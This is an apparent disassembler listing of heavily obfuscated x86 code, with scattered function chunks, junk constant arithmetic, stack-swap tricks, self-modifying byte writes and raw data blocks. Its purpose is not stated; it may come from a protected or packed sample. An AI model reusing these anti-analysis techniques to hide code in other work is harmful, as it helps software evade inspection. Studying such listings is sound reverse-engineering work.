push 42BC145Ch
pop eax
push ebx
jmp loc_42FAB8
; ---------------------------------------------------------------------------
align 2
xchg edi, [esp]
pop edi
push 0F16A060Ch
push offset loc_42E898
jmp locret_43012D
; ---------------------------------------------------------------------------
align 2
xor ecx, 4AFA3F1Eh
popf
cdq
idiv ecx
mov [ebp-8], eax
inc dword ptr [ebp-10h]
cmp dword ptr [ebp-8], 0
jmp loc_430A24
; ---------------------------------------------------------------------------
align 4
dd 0E9F83300h, 385Fh, 0DF685200h, 5A05EA83h, 9EF7F281h
dd 0C2815DE0h, 524D8661h, 95A6E281h, 0EA819643h, 509172ECh
dd 26DEE9h, 0C3000000h
db 0
; =============== S U B R O U T I N E =======================================
sub_42F04D proc near ; CODE XREF: fzj3qwht:004309DE�j
; fzj3qwht:00430BCB�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 004308AD SIZE 0000000B BYTES
xchg eax, [esp+0]
xchg edi, [esp+0]
mov eax, edi
pop edi
mov [esi], eax
pop esi
loc_42F059: ; CODE XREF: fzj3qwht:0042EB6B�j
pushf
call sub_4312D7
loc_42F05F: ; CODE XREF: sub_430315+A�j
jmp loc_4308AD
sub_42F04D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0F0685000h, 5816BD4Ch, 0E90CC0C1h, 0FFFFF871h, 58240487h
dd 7D0D689Ch, 8159F794h, 418DD4F1h, 0FAE957D7h, 5500001Eh
dd 2C87EB8Bh, 0ECFBBB24h, 46E90042h, 2Ch, 7DC78100h, 874D102Dh
dd 3159240Ch, 850F49C2h, 3372h, 204AE9h, 8B0F0000h, 1C6Ch
dd 8C26E981h, 0F8685644h, 0E90042FCh, 1D30h, 0D1870000h
dd 6B59E381h, 0E9815DDAh, 0D603131h, 8DFE9h, 0C2810000h
dd 0BA4757FAh, 25CEE9h, 0C30000h, 0C1C1E913h, 3AE0811Ah
dd 81163211h, 2E8703C0h, 53C5037Fh, 0C52DA968h, 98E95B9Ch
dd 1Ch, 3369810Fh, 93E90000h, 87000003h, 3798E92Eh, 89000000h
dd 17ECE911h, 0
dd 1AC2840Fh, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_42F134: ; CODE XREF: sub_431F5F-1446�j
jmp nullsub_147
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
align 2
sub ebx, ecx
jle loc_42EF3E
adc esi, 0D22D44C4h
mov edi, ebx
jmp loc_430BF4
; ---------------------------------------------------------------------------
loc_42F14F: ; DATA XREF: sub_42F4AE:loc_43045A�o
dec ecx
pop dword ptr [ebp+32CCh]
push ebx
mov ebx, esi
xchg ebx, [esp]
mov esi, offset byte_42FA73
jmp loc_431F76
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F5F
loc_42F167: ; CODE XREF: sub_431F5F+11�j
jnz loc_4311F0
jmp loc_43112B
; END OF FUNCTION CHUNK FOR sub_431F5F
; ---------------------------------------------------------------------------
dw 0C600h
; ---------------------------------------------------------------------------
add esp, edi
pop ecx
and edx, 0C7760987h
sub edx, 8138A0BCh
jmp loc_4326D5
; =============== S U B R O U T I N E =======================================
sub_42F188 proc near ; CODE XREF: fzj3qwht:004302F1�j
; FUNCTION CHUNK AT 0042F9E4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043197D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431C6E SIZE 0000000F BYTES
xchg ebx, [esp+0]
pop ebx
mov byte ptr [eax], 3
pop eax
push 0BBE934A2h
pop esi
and esi, 66EAE457h
cmp esi, 69421CB2h
jmp loc_43197D
sub_42F188 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42F1A7: ; DATA XREF: sub_43041D-10EE�o
push edi
push 70AFED03h
pop edi
sub edi, 0D94413C9h
rol edi, 14h
add edi, 6C9985FCh
jmp loc_42F3DB
; ---------------------------------------------------------------------------
xor edi, eax
jmp loc_43264B
; ---------------------------------------------------------------------------
loc_42F1C9: ; CODE XREF: fzj3qwht:0042FE4C�j
pop ebx
retn 0Ch
; ---------------------------------------------------------------------------
align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_139. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 83D7BDF0h
jmp loc_43180A
; ---------------------------------------------------------------------------
add edx, 8B68BECEh
or edx, 7BDE42BAh
xor edx, 907FFCFBh
add edx, 10A155E7h
jmp loc_43062B
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_42F1F8: ; CODE XREF: sub_42F4AE:loc_42F4E0�j
mov edx, esi
pop esi
and edx, 4CD3CB6Eh
add edx, 0B3F0012Ah
call sub_430B68
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
dd 1C870000h, 51505B24h, 0E1E9CF8Bh, 13000022h, 0F4DB81C5h
dd 0E9314B9Ch, 0CA8h, 0FAE80000h, 2300001Dh, 0FD2BE9CBh
dd 0F00FFFFh, 0FFFEB88Dh, 0CC830FFFh, 81000003h, 6AB0A6D9h
dd 0FEA2E9FAh, 0C300FFFFh, 13DBE900h, 73E90000h, 0FFFFFFh
dd 2033E900h
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42F263 proc near ; CODE XREF: fzj3qwht:loc_430A50�p
; fzj3qwht:00430DC4�j
xchg esi, [esp+0]
pop esi
push 5E4244D3h
pop esi
or esi, 0D715F8E6h
jmp loc_42F73C
sub_42F263 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ebx, [edx]
jmp loc_432804
; ---------------------------------------------------------------------------
align 10h
dd 241C8700h, 20D2E8h, 0E9000000h, 2D4Fh, 0CDC10000h, 0E9D70319h
dd 1D8Dh
db 0
; ---------------------------------------------------------------------------
loc_42F29D: ; CODE XREF: fzj3qwht:0042EB38�j
jge loc_4328A5
call loc_4314E1
; START OF FUNCTION CHUNK FOR sub_430C8C
loc_42F2A8: ; CODE XREF: sub_430C8C+D�j
jmp loc_42F671
; END OF FUNCTION CHUNK FOR sub_430C8C
; ---------------------------------------------------------------------------
and edi, ecx
jmp sub_430C8C
; ---------------------------------------------------------------------------
push 50E0B77Fh
pop ecx
add ecx, 955E3D35h
rol ecx, 19h
xor ecx, 9FC8C517h
add eax, ecx
pop ecx
mov eax, [eax]
jmp loc_431A72
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_42F2D4: ; CODE XREF: sub_42F4AE+DE�j
; fzj3qwht:loc_42FAB8�j
mov ebx, offset nullsub_144
jmp loc_4325E1
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_101. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_42F2E3: ; DATA XREF: sub_43005C-118B�o
pop esi
loc_42F2E4: ; CODE XREF: fzj3qwht:loc_4322A0�j
push (offset loc_430364+1)
jmp loc_4322E3
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_42F4AE
loc_42F2F0: ; CODE XREF: sub_42F4AE+17�j
xchg ebx, [esp-4+arg_0]
xchg eax, [esp-4+arg_0]
mov ebx, eax
pop eax
add ecx, 0DF6D33BFh
popf
push offset byte_4317BD
jmp loc_432376
; END OF FUNCTION CHUNK FOR sub_42F4AE
; ---------------------------------------------------------------------------
align 4
dd 0E89D008Bh, 1D82h, 0E9990000h, 2D10h, 243C8700h, 84C685Fh
dd 0F5E90043h, 0Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43041D
loc_42F32C: ; CODE XREF: sub_43041D-D0E�j
; fzj3qwht:0042F71A�j
xchg ebx, [esp+0]
push offset loc_42F1A7
jmp loc_43083D
; END OF FUNCTION CHUNK FOR sub_43041D
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_42F33B: ; CODE XREF: sub_431686-2A24�j
xor esi, 398EA582h
push ecx
mov ecx, offset loc_430CB2
jmp loc_42FEB9
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
loc_42F34C: ; CODE XREF: fzj3qwht:loc_43108F�j
sub edx, 8875A63Eh
and edx, 96965202h
sub edx, 40F27304h
js loc_432679
; ---------------------------------------------------------------------------
dd 8E90000h, 0FFFFFFEh, 0DB581h, 0E9318700h, 3301h, 24048700h
; CODE XREF: fzj3qwht:004326AF�j
dd 8B242C87h, 6C65DC5h, 77E85E8Bh, 0Eh
db 0
; ---------------------------------------------------------------------------
loc_42F38D: ; CODE XREF: fzj3qwht:0042EF9F�j
jmp loc_430BAB
; ---------------------------------------------------------------------------
dw 0C300h
dd 35B9E900h, 0C3000000h, 64C08100h, 0E92B73E9h, 657h
dd 0F842820Fh, 0FFFFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431686
loc_42F3B0: ; CODE XREF: sub_431686-D23�j
jmp loc_430CA0
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
db 2 dup(0), 5Ah
; ---------------------------------------------------------------------------
or edi, 89137F78h
and eax, ebp
test ebp, 70A12882h
jmp loc_430130
; ---------------------------------------------------------------------------
align 4
dd 8B02C600h, 3102C65Ah, 34A9E85Ah
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_42F3DB: ; CODE XREF: fzj3qwht:0042F1BD�j
jmp loc_42F5F2
; ---------------------------------------------------------------------------
dd 588D0F00h, 0C1000013h, 2A8B1BC3h, 4CE93189h, 13h, 3571B4BBh
; CODE XREF: sub_42F4AE+2A12�j
dd 0E9D81B18h, 120Ah, 24048799h, 8B243487h, 0C0815EC6h
dd 9F74F076h, 42F02568h, 0A1DE900h, 0
; ---------------------------------------------------------------------------
mov edx, 0BCF8139h
jnp loc_42F99E
jmp sub_431F11
; ---------------------------------------------------------------------------
dd 3B680000h, 0E9004316h, 0B42h
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_136. PRESS KEYPAD "+" TO EXPAND]
dw 0E900h
dd 1E7Bh, 0F7810000h, 968894FBh, 8B5FC703h, 0CA689C00h
dd 59D941CBh, 2F0EE9h, 87000000h, 487241Ch, 58D88B24h
dd 0E9243C87h, 0F3h, 0E7840F00h, 51000013h, 42EF49B9h
dd 0FAC6E900h, 0FFFFh
; ---------------------------------------------------------------------------
locret_42F480: ; CODE XREF: fzj3qwht:00432815�j
retn
; ---------------------------------------------------------------------------
loc_42F481: ; DATA XREF: fzj3qwht:00432810�o
popf
mov al, [eax]
sub al, 99h
push 0D31428Ch
pop edx
or edx, 0C7FFAF9Bh
jmp loc_4312BC
; ---------------------------------------------------------------------------
align 4
mov esi, ebp
pop ebp
pushf
push ecx
push 0D02DBA39h
xchg edi, [esp]
mov ecx, edi
pop edi
jmp loc_431D4E
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_42F4AE proc near ; CODE XREF: sub_42EE90+106C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
; FUNCTION CHUNK AT 0042EEDC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042F1F8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042F2D4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042F2F0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042FBA7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042FBEB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042FCB8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042FDFB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042FE7E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043000C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430121 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043042F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043045A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00430669 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00430A70 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00430EE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430F5C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00430FDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004318F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431EA6 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00432243 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432376 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043243C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004325E1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00432766 SIZE 0000000F BYTES
xchg eax, [esp-8+arg_4]
pop eax
add ebx, ebp
add ebx, 69DEF140h
mov ebx, [ebx]
jmp loc_42F6B2
; ---------------------------------------------------------------------------
align 2
mov [ebp+0], edx
jmp loc_42F2F0
; ---------------------------------------------------------------------------
dw 0D381h
dd 0AAB8E258h, 0FFFF86E9h, 3107C6FFh, 0FE12E85Fh, 0FFFFh
; ---------------------------------------------------------------------------
loc_42F4E0: ; CODE XREF: sub_431452-154�j
jmp loc_42F1F8
; ---------------------------------------------------------------------------
align 2
cmp edx, ebp
jmp loc_430669
; ---------------------------------------------------------------------------
align 2
test eax, 0C8450A3h
jmp loc_431EA6
; ---------------------------------------------------------------------------
db 2 dup(0), 5Bh
dd 0BF10E381h, 0C3F71BB1h, 2000h, 0FFFC1FE9h, 0C60000FFh
dd 6851C300h, 6090FF8h, 0C6C98159h, 0E9CD8639h, 3047h
db 0
; ---------------------------------------------------------------------------
locret_42F525: ; CODE XREF: sub_42F4AE:loc_4318F9�j
retn
; ---------------------------------------------------------------------------
align 4
jmp loc_432766
; ---------------------------------------------------------------------------
db 2 dup(0), 57h ; CODE XREF: fzj3qwht:004311A1�j
; fzj3qwht:loc_431ABE�j
db 0BFh ; ¿
db 65h ; e
db 1Fh
db 43h ; C
db 0
db 0E9h ; é
db 0A2h ; ¢
db 0F9h ; ù
db 0FFh
db 0FFh
db 0
; ---------------------------------------------------------------------------
locret_42F53B: ; CODE XREF: fzj3qwht:loc_432430�j
retn
; ---------------------------------------------------------------------------
loc_42F53C: ; CODE XREF: fzj3qwht:00432964�j
jmp loc_42FE7E
; ---------------------------------------------------------------------------
jmp loc_43042F
; ---------------------------------------------------------------------------
dw 0E800h
dd 0FFFFFA4Bh, 0D5130000h, 2042E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_42F556: ; CODE XREF: fzj3qwht:00430C0C�j
add eax, ebx
call sub_43098E
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 0FFFFF9B1h, 24B800Fh, 0DA1B0000h, 2815E9h
db 0
; ---------------------------------------------------------------------------
locret_42F571: ; CODE XREF: fzj3qwht:loc_4322E3�j
retn
; ---------------------------------------------------------------------------
align 4
jmp nullsub_154
; ---------------------------------------------------------------------------
db 0Fh, 8Eh, 0B6h
dd 0E900001Dh, 0FFFFF444h
; ---------------------------------------------------------------------------
locret_42F584: ; CODE XREF: fzj3qwht:loc_4311DC�j
retn
; ---------------------------------------------------------------------------
jmp nullsub_155
; ---------------------------------------------------------------------------
xchg edx, eax
jnp loc_42F2D4
jmp sub_4309EE
; ---------------------------------------------------------------------------
align 4
jnb loc_43141A
jmp loc_430F5C
; ---------------------------------------------------------------------------
xchg ebp, [esp-0Ch+arg_8]
mov ebx, offset loc_42FDEC
jmp loc_430A70
; ---------------------------------------------------------------------------
locret_42F5B0: ; CODE XREF: sub_4316FE:loc_43249C�j
retn
; ---------------------------------------------------------------------------
align 2
loc_42F5B2: ; CODE XREF: fzj3qwht:0042EE36�j
mov byte ptr [eax], 9Ch
pop eax
xor eax, 0CAC7E5B1h
add eax, 4FB77B60h
add eax, ebp
push offset sub_4301B7
jmp loc_430FDF
; ---------------------------------------------------------------------------
dw 8100h ; CODE XREF: sub_43239B+A�j
dd 913564EAh, 13C2C15Dh, 5E47EA81h, 0F2811637h, 0E6B0A611h
dd 0C281D503h, 1FF958DCh, 2212E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_42F5F2: ; CODE XREF: fzj3qwht:loc_42F3DB�j
mov byte ptr [edi], 87h
pop edi
mov ecx, ebx
xchg edx, [esp-10h+arg_C]
mov ebx, edx
jmp loc_432243
; ---------------------------------------------------------------------------
align 4
dd 28E9D133h, 0FFFFF4h, 0BF118900h, 0B564A4B2h, 2E01E9h
dd 242C8700h, 0F8126856h, 535E6E5Dh, 431B2EBBh, 0FF19E900h
dd 0FFFFh, 1487EA87h, 51685A24h, 5A9C028Ch, 0E917C2C1h
dd 1353h, 0C2810000h, 84566374h, 1487128Bh, 174C6824h
dd 90E90043h, 0FFFFF5h, 3A8C0F00h, 13000004h, 0C1CD1BE8h
dd 0DEE91EC9h, 1Dh
db 0
; ---------------------------------------------------------------------------
loc_42F671: ; CODE XREF: sub_430C8C:loc_42F2A8�j
push ecx
mov ecx, esi
xchg ecx, [esp-0Ch+arg_8]
jmp loc_430EE6
; ---------------------------------------------------------------------------
dd 0BDE95D00h, 1Bh, 430E5F68h, 2D3FE900h, 4AB80000h, 0E9FFF4D5h
dd 14B4h, 8C0F0000h, 8E1h, 0A8E90000h, 3FFFFFBh, 0E93087F0h
dd 8D1h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_42F6B2: ; CODE XREF: sub_42F4AE+E�j
popf
push offset loc_430D85
jmp loc_4318F9
sub_42F4AE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0), 0C3h ; CODE XREF: fzj3qwht:004302EA�j
dd 5BE90000h, 2Dh, 8702C600h, 0F7C2815Ah, 870AC332h, 0FAE92414h
; CODE XREF: fzj3qwht:loc_431F03�j
dd 0Bh, 0AE0C100h, 0FFF394E9h, 0E9C300FFh, 29FFh, 0E90B8900h
dd 2FC0h, 0D209108Bh, 261C840Fh, 0E9520000h, 2F02h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43041D
loc_42F706: ; CODE XREF: sub_43041D:loc_42F88A�j
add edx, ebx
pop ebx
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jnz loc_42F32C
jmp sub_430B68
; END OF FUNCTION CHUNK FOR sub_43041D
; ---------------------------------------------------------------------------
jmp loc_42F32C
; ---------------------------------------------------------------------------
align 10h
dd 240C8700h, 24148759h, 0FFF108E9h, 8B5500FFh, 27C6E9EFh
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FA52
loc_42F736: ; CODE XREF: sub_42FA52+7�j
jge loc_43191A
loc_42F73C: ; CODE XREF: sub_42F263+10�j
jmp loc_4317D6
; END OF FUNCTION CHUNK FOR sub_42FA52
; ---------------------------------------------------------------------------
align 2
dw 0F0E9h
dd 0FFFFFAh, 0AFF68199h, 0E907A695h, 21C6h, 0C30000h, 0A1C08100h
dd 3D14EE7h, 0BFBE56C5h, 0E90042FAh, 669h, 59240C87h, 4326F968h
dd 2D18E900h, 0
db 0C6h ; Æ
db 3
db 1
db 87h ; ‡
db 2Ch ; ,
db 24h ; $
db 8Bh ; ‹
db 0DDh ; Ý
db 5Dh ; ]
db 0ACh ; ¬
db 0FDh ; ý
db 0C2h ; Â
db 0E9h ; é
db 0B8h ; ¸
dw 0FFF3h
dd 0A85000FFh, 363A5868h, 0C0C158D1h, 0B0C0810Bh, 0E84E7061h
dd 2BAAh, 66E90000h, 0E9000006h, 0FFFFF589h, 0C30000h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4312D7
loc_42F7B5: ; CODE XREF: sub_4312D7+E�j
jmp loc_4302A9
; END OF FUNCTION CHUNK FOR sub_4312D7
; ---------------------------------------------------------------------------
jmp loc_430D55
; ---------------------------------------------------------------------------
jz loc_431232
jmp sub_42FC3B
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_430E27
loc_42F7CC: ; CODE XREF: sub_430E27:loc_42FD05�j
mov byte ptr [edi], 9Ch
pop edi
mov [esi], eax
pop esi
loc_42F7D3: ; DATA XREF: sub_430E27+4�o
mov esp, 0EDB12368h
mov esp, 4AC88158h
db 64h
mov ch, 0B9h
jmp loc_431FD9
; END OF FUNCTION CHUNK FOR sub_430E27
; ---------------------------------------------------------------------------
align 2
loc_42F7E6: ; CODE XREF: fzj3qwht:0042EA20�j
xchg eax, [esp]
xchg edi, [esp]
mov eax, edi
pop edi
jmp loc_431475
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_42F7F7: ; CODE XREF: fzj3qwht:0042E917�j
retn
; ---------------------------------------------------------------------------
jmp loc_43132E
; ---------------------------------------------------------------------------
loc_42F7FD: ; DATA XREF: fzj3qwht:0042E912�o
push offset byte_4319A1
jmp loc_42EA3F
; ---------------------------------------------------------------------------
align 4
dd 81D60300h, 68454AC1h, 98B9D23h, 0F2F4F8BAh, 0FCC031F1h
dd 0FFFEA1E9h, 41C381FFh, 687A32CFh, 431491h, 2518E9h
dd 8DC38100h, 0E97C73ADh, 26Eh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_42F83E: ; DATA XREF: sub_430F2A:loc_43246C�o
mov byte ptr [eax], 2Ch
pop eax
add eax, 1076046Fh
mov eax, [eax]
popf
mov al, [eax]
loc_42F84D: ; DATA XREF: sub_430F2A+5�o
sub al, 99h
jmp loc_42F9FA
; ---------------------------------------------------------------------------
dd 0D3C28100h, 0E9D774F6h, 1540h, 0F1880F00h, 28h, 752E9h
dd 0EBC10000h, 28DEE91Ah, 0F000000h, 6568Ah, 0D31E900h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_42F883: ; CODE XREF: fzj3qwht:00432855�j
jl loc_4306CE
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43041D
loc_42F88A: ; CODE XREF: sub_43041D+E9�j
jmp loc_42F706
; END OF FUNCTION CHUNK FOR sub_43041D
; ---------------------------------------------------------------------------
align 10h
add ecx, ebp
jmp loc_4306C7
; ---------------------------------------------------------------------------
db 68h
dd offset loc_430B9B
dd 0FFF283E9h, 0F0000FFh, 18F83h
db 0
; =============== S U B R O U T I N E =======================================
sub_42F8A9 proc near ; CODE XREF: sub_42EFCF+1504�p
; FUNCTION CHUNK AT 00432782 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
pop esi
jmp loc_432782
sub_42F8A9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
loc_42F8B4: ; CODE XREF: fzj3qwht:004312D0�j
mov byte ptr [esi], 9Dh
pop esi
pop edx
rol edx, 17h
or edx, 0E57584B0h
call sub_430C13
; ---------------------------------------------------------------------------
db 0
db 0
db 0C6h ; Æ
db 1
db 3
db 59h ; Y
db 0E8h ; è
db 71h ; q
db 14h
db 0
db 0
db 0
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_149. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0), 0E9h
dd 2A98h, 58240487h, 4F6E85Fh ; CODE XREF: fzj3qwht:loc_4322FE�j
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_42F8E7: ; CODE XREF: fzj3qwht:loc_430A55�j
and eax, 470262A5h
sub eax, 0A33EDB30h
rol eax, 0Eh
call sub_431E69
add cl, ch ; CODE XREF: sub_431E7D+7�j
cdq
and eax, 3AE90000h
sub [eax], al
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
sub ebx, eax
xchg ebp, esi
jmp loc_43103F
; ---------------------------------------------------------------------------
align 2
loc_42F912: ; CODE XREF: fzj3qwht:0042EB2C�j
call sub_43060A
add cl, ch
sahf
add cs:[eax], al
call near ptr dword_42E9A4+24h
; START OF FUNCTION CHUNK FOR sub_43041D
loc_42F922: ; CODE XREF: sub_43041D+B�j
jmp loc_4304E8
; END OF FUNCTION CHUNK FOR sub_43041D
; ---------------------------------------------------------------------------
jmp loc_4321D4
; ---------------------------------------------------------------------------
dd 0E9030000h, 371E9h, 992C0000h, 0FFA73768h, 0EA815A86h
dd 664A2151h, 9397CA81h, 0D8E910DFh, 0FFFFFFh, 82E9D60Bh
db 0Bh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430E46
loc_42F957: ; CODE XREF: sub_430E46+7�j
; DATA XREF: fzj3qwht:004312CB�o
aas
mov eax, [ebp-0Ch]
mov esp, ebp
call sub_4328BA
add cl, ch
adc al, 12h
; END OF FUNCTION CHUNK FOR sub_430E46
; ---------------------------------------------------------------------------
dw 0
db 0
; ---------------------------------------------------------------------------
loc_42F969: ; CODE XREF: fzj3qwht:0043094D�j
jmp loc_42F9D9
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFC1E9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4316FE
loc_42F975: ; CODE XREF: sub_4316FE:loc_42ED04�j
mov ebp, esp
push offset sub_42FF6B
jmp loc_43249C
; END OF FUNCTION CHUNK FOR sub_4316FE
; ---------------------------------------------------------------------------
locret_42F981: ; CODE XREF: fzj3qwht:loc_4318C2�j
retn
; ---------------------------------------------------------------------------
align 4
loc_42F984: ; CODE XREF: fzj3qwht:00432176�j
jmp loc_431270
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 2922h, 8BDE9h, 87000000h, 875F243Ch
; ---------------------------------------------------------------------------
sbb al, 24h
loc_42F99E: ; CODE XREF: fzj3qwht:0042F421�j
jmp loc_431113
; ---------------------------------------------------------------------------
align 4
dd 0E9B56800h, 2CA6E4C0h, 2AE95524h, 0FFFFFDh, 4421EF81h
dd 2FE94242h, 11h, 0F320800Fh, 82E9FFFFh, 1Ah, 2EE85300h
dd 10h, 1BD9E9h
db 0
; ---------------------------------------------------------------------------
loc_42F9D9: ; CODE XREF: fzj3qwht:loc_42F969�j
push offset loc_42FDB1
jmp near ptr dword_42E794+6Fh
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_42F188
loc_42F9E4: ; CODE XREF: sub_42F188:loc_43197D�j
jl loc_431C6F
not ebx
jmp loc_431C6E
; END OF FUNCTION CHUNK FOR sub_42F188
; ---------------------------------------------------------------------------
align 2
locret_42F9F2: ; CODE XREF: fzj3qwht:0042E78D�j
retn
; ---------------------------------------------------------------------------
align 4
dd 1D8EE900h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_42F9FA: ; CODE XREF: fzj3qwht:0042F84F�j
jmp loc_4313CB
; ---------------------------------------------------------------------------
jmp loc_430043
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_42FA05: ; DATA XREF: fzj3qwht:0042E788�o
jmp loc_4313EB
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_42FA0B: ; CODE XREF: fzj3qwht:0042E782�j
retn
; ---------------------------------------------------------------------------
dd 8B520000h, 0FDA4E9D5h, 0F00FFFFh, 16189h, 0B68AC00h
dd 0E9004326h, 0D36h, 3C2C100h, 431B6E68h, 0FB3EE900h
dd 0FFFFh, 810CC3C1h, 773950F3h, 0B5CB8160h, 6802CC75h
dd 42F831h, 1DB1E9h
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_42FA52 proc near ; CODE XREF: fzj3qwht:004318D2�p
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042F736 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042FE43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004303A4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004317D6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043191A SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00431F49 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004320C3 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043273D SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
cmp ebx, edi
pop edi
jmp loc_42F736
sub_42FA52 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg ebx, [esp]
push edx
mov edx, offset loc_4322CD
jmp loc_43025A
; ---------------------------------------------------------------------------
db 0
byte_42FA6D db 87h, 14h, 24h ; DATA XREF: fzj3qwht:loc_42FEEC�o
db 8Bh, 0DAh, 5Ah
byte_42FA73 db 3Ah ; DATA XREF: fzj3qwht:0042F15C�o
dd 0F08B2404h, 8B242C87h, 0F148E9C5h, 8100FFFFh, 0BDE2B5C9h
; CODE XREF: fzj3qwht:00432367�j
dd 0BC18190h
db 14h, 2, 26h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B7
loc_42FA8F: ; CODE XREF: sub_4301B7-14A2�j
push offset loc_43018A
jmp locret_4314FA
; END OF FUNCTION CHUNK FOR sub_4301B7
; ---------------------------------------------------------------------------
loc_42FA99: ; CODE XREF: fzj3qwht:00431B68�j
mov byte ptr [ecx], 3
pop ecx
push 42EC12h
jmp loc_4318C2
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
align 2
dw 3C6h
dd 243C8788h, 0E85FDF8Bh, 0FFFFF125h
; ---------------------------------------------------------------------------
loc_42FAB8: ; CODE XREF: fzj3qwht:0042EFE8�j
jmp loc_42F2D4
